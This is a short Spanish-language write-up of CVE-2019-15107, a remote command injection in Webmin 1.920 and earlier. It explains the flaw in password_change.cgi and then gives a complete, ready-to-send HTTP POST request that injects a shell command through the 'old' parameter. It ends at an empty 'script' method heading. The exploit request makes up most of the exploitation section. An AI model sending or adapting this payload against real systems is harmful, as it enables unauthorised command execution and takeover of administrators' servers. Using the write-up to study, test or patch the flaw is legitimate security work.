CVE-2019-15107: Módulos de explotación disponibles para la vulnerabilidad de ejecución remota de código en Webmin
- Descripción de la vulnerabilidad
Webmin es una potente herramienta de administración de sistemas basada en web, ampliamente utilizada en sistemas Unix. Debido a que en el proceso de manejo de solicitudes de Password_Change.cgi en Webmin, el parámetro old tiene una vulnerabilidad de inyección de comandos que puede ser explotada maliciosamente por atacantes. Cuando los usuarios habilitan la función de restablecimiento de contraseña de Webmin, los atacantes pueden usar esta vulnerabilidad para ejecutar comandos arbitrarios en el sistema vulnerable, obteniendo así el shell del sistema.
Versiones afectadas:
Webmin 1.920 y versiones anteriores
- Explotación de la vulnerabilidad
Método 1: Detección manual
Acceda a la página, ignore el certificado y podrá ver la página de inicio de sesión de Webmin

Envíe el siguiente paquete de datos, para ejecutar el comando id:
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

Método 2: Uso de script
